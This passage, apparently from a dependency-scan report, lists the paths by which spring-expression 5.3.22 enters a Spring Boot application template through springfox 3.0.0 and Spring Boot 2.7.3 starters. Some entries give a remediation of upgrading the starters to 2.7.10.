  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
